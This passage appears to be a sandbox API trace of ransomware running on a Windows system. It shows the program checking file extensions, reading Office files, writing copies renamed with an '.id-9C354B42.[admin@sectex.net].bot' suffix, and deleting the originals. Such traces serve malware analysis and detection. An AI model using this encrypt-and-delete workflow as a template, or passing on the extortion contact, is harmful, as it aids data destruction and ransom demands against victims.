	[0047.966] lstrlenW (lpString=".rar") returned 4
	[0047.966] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.966] lstrlenW (lpString=".bz2") returned 4
	[0047.966] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.966] lstrlenW (lpString=".7z") returned 3
	[0047.966] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.966] lstrlenW (lpString=".dbf") returned 4
	[0047.966] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.966] lstrlenW (lpString=".1cd") returned 4
	[0047.966] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.966] lstrlenW (lpString=".jpg") returned 4
	[0047.966] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.966] lstrlenW (lpString=".doc") returned 4
	[0047.966] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0047.966] lstrlenW (lpString=".docx") returned 5
	[0047.966] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0047.966] lstrlenW (lpString=".pdf") returned 4
	[0047.966] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0047.966] lstrlenW (lpString=".xls") returned 4
	[0047.966] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0047.966] lstrlenW (lpString=".xlsx") returned 5
	[0047.966] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0047.966] lstrlenW (lpString=".ppt") returned 4
	[0047.966] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0047.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.966] lstrlenW (lpString=".zip") returned 4
	[0047.966] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0047.967] lstrlenW (lpString=".rar") returned 4
	[0047.967] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0047.967] lstrlenW (lpString=".bz2") returned 4
	[0047.967] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0047.967] lstrlenW (lpString=".7z") returned 3
	[0047.967] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0047.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.967] lstrlenW (lpString=".dbf") returned 4
	[0047.967] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0047.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.967] lstrlenW (lpString=".1cd") returned 4
	[0047.967] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0047.967] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 74
	[0047.967] lstrlenW (lpString=".jpg") returned 4
	[0047.967] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0047.967] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0047.967] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0047.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.080] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1571) returned 1
	[0048.080] CloseHandle (hObject=0x1a8) returned 1
	[0048.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 0x20
	[0048.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0048.080] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.080] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214
	[0048.080] GetLastError () returned 0x0
	[0048.080] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x623, lpOverlapped=0x0) returned 1
	[0048.082] WriteFile (in: hFile=0x214, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x630, lpOverlapped=0x0) returned 1
	[0048.083] ReadFile (in: hFile=0x1a8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.083] WriteFile (in: hFile=0x214, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0048.083] SetEndOfFile (hFile=0x214) returned 1
	[0048.083] CloseHandle (hObject=0x214) returned 1
	[0048.083] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.083] SetEndOfFile (hFile=0x1a8) returned 1
	[0048.084] CloseHandle (hObject=0x1a8) returned 1
	[0048.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.084] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 1
	[0048.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.084] lstrlenW (lpString=".doc") returned 4
	[0048.084] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0048.084] lstrlenW (lpString=".docx") returned 5
	[0048.084] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0048.084] lstrlenW (lpString=".pdf") returned 4
	[0048.084] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0048.084] lstrlenW (lpString=".xls") returned 4
	[0048.084] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0048.084] lstrlenW (lpString=".xlsx") returned 5
	[0048.084] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0048.084] lstrlenW (lpString=".ppt") returned 4
	[0048.084] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0048.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.085] lstrlenW (lpString=".zip") returned 4
	[0048.085] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0048.085] lstrlenW (lpString=".rar") returned 4
	[0048.085] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0048.085] lstrlenW (lpString=".bz2") returned 4
	[0048.085] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0048.085] lstrlenW (lpString=".7z") returned 3
	[0048.085] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0048.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.085] lstrlenW (lpString=".dbf") returned 4
	[0048.085] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0048.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.085] lstrlenW (lpString=".1cd") returned 4
	[0048.085] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0048.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.085] lstrlenW (lpString=".jpg") returned 4
	[0048.085] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0048.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.085] lstrlenW (lpString=".doc") returned 4
	[0048.085] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0048.085] lstrlenW (lpString=".docx") returned 5
	[0048.085] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0048.085] lstrlenW (lpString=".pdf") returned 4
	[0048.085] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0048.085] lstrlenW (lpString=".xls") returned 4
	[0048.085] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0048.085] lstrlenW (lpString=".xlsx") returned 5
	[0048.085] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0048.085] lstrlenW (lpString=".ppt") returned 4
	[0048.085] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0048.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.085] lstrlenW (lpString=".zip") returned 4
	[0048.086] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0048.086] lstrlenW (lpString=".rar") returned 4
	[0048.086] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0048.086] lstrlenW (lpString=".bz2") returned 4
	[0048.086] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0048.086] lstrlenW (lpString=".7z") returned 3
	[0048.086] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0048.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.086] lstrlenW (lpString=".dbf") returned 4
	[0048.086] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0048.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.086] lstrlenW (lpString=".1cd") returned 4
	[0048.086] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0048.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76
	[0048.086] lstrlenW (lpString=".jpg") returned 4
	[0048.086] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0048.086] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0048.086] lstrlenW (lpString="VBHW6.CHM") returned 9
	[0048.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.805] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=58026) returned 1
	[0048.805] CloseHandle (hObject=0x184) returned 1
	[0048.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 0x20
	[0048.806] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.806] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.806] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0048.806] GetLastError () returned 0x0
	[0048.806] ReadFile (in: hFile=0x184, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xe2aa, lpOverlapped=0x0) returned 1
	[0048.809] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe2b0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe2b0, lpOverlapped=0x0) returned 1
	[0048.811] ReadFile (in: hFile=0x184, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.811] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0048.812] SetEndOfFile (hFile=0x194) returned 1
	[0048.812] CloseHandle (hObject=0x194) returned 1
	[0048.812] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.812] SetEndOfFile (hFile=0x184) returned 1
	[0048.813] CloseHandle (hObject=0x184) returned 1
	[0048.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.814] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm")) returned 1
	[0048.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.814] lstrlenW (lpString=".doc") returned 4
	[0048.814] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.814] lstrlenW (lpString=".docx") returned 5
	[0048.814] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.814] lstrlenW (lpString=".pdf") returned 4
	[0048.814] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.814] lstrlenW (lpString=".xls") returned 4
	[0048.814] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.814] lstrlenW (lpString=".xlsx") returned 5
	[0048.814] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.814] lstrlenW (lpString=".ppt") returned 4
	[0048.814] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.815] lstrlenW (lpString=".zip") returned 4
	[0048.815] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString=".rar") returned 4
	[0048.815] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString=".bz2") returned 4
	[0048.815] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.815] lstrlenW (lpString=".7z") returned 3
	[0048.815] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.815] lstrlenW (lpString=".dbf") returned 4
	[0048.815] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.815] lstrlenW (lpString=".1cd") returned 4
	[0048.815] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.815] lstrlenW (lpString=".jpg") returned 4
	[0048.815] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.815] lstrlenW (lpString=".doc") returned 4
	[0048.815] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString=".docx") returned 5
	[0048.815] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.815] lstrlenW (lpString=".pdf") returned 4
	[0048.815] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString=".xls") returned 4
	[0048.815] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString=".xlsx") returned 5
	[0048.815] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.815] lstrlenW (lpString=".ppt") returned 4
	[0048.815] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.815] lstrlenW (lpString=".zip") returned 4
	[0048.816] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.816] lstrlenW (lpString=".rar") returned 4
	[0048.816] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.816] lstrlenW (lpString=".bz2") returned 4
	[0048.816] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.816] lstrlenW (lpString=".7z") returned 3
	[0048.816] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.816] lstrlenW (lpString=".dbf") returned 4
	[0048.816] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.816] lstrlenW (lpString=".1cd") returned 4
	[0048.816] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 70
	[0048.816] lstrlenW (lpString=".jpg") returned 4
	[0048.816] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.816] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0048.816] lstrlenW (lpString="VBUI6.CHM") returned 9
	[0048.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.817] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=416918) returned 1
	[0048.817] CloseHandle (hObject=0x184) returned 1
	[0048.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 0x20
	[0048.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.817] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.817] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.817] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.817] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0048.818] GetLastError () returned 0x0
	[0048.818] ReadFile (in: hFile=0x184, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x65c96, lpOverlapped=0x0) returned 1
	[0048.843] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x65ca0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x65ca0, lpOverlapped=0x0) returned 1
	[0048.851] ReadFile (in: hFile=0x184, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.851] WriteFile (in: hFile=0x194, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0048.852] SetEndOfFile (hFile=0x194) returned 1
	[0048.852] CloseHandle (hObject=0x194) returned 1
	[0048.852] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.852] SetEndOfFile (hFile=0x184) returned 1
	[0048.855] CloseHandle (hObject=0x184) returned 1
	[0048.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.856] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 1
	[0048.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70
	[0048.856] lstrlenW (lpString=".doc") returned 4
	[0048.856] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.856] lstrlenW (lpString=".docx") returned 5
	[0048.856] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.856] lstrlenW (lpString=".pdf") returned 4
	[0048.856] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.856] lstrlenW (lpString=".xls") returned 4
	[0048.856] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
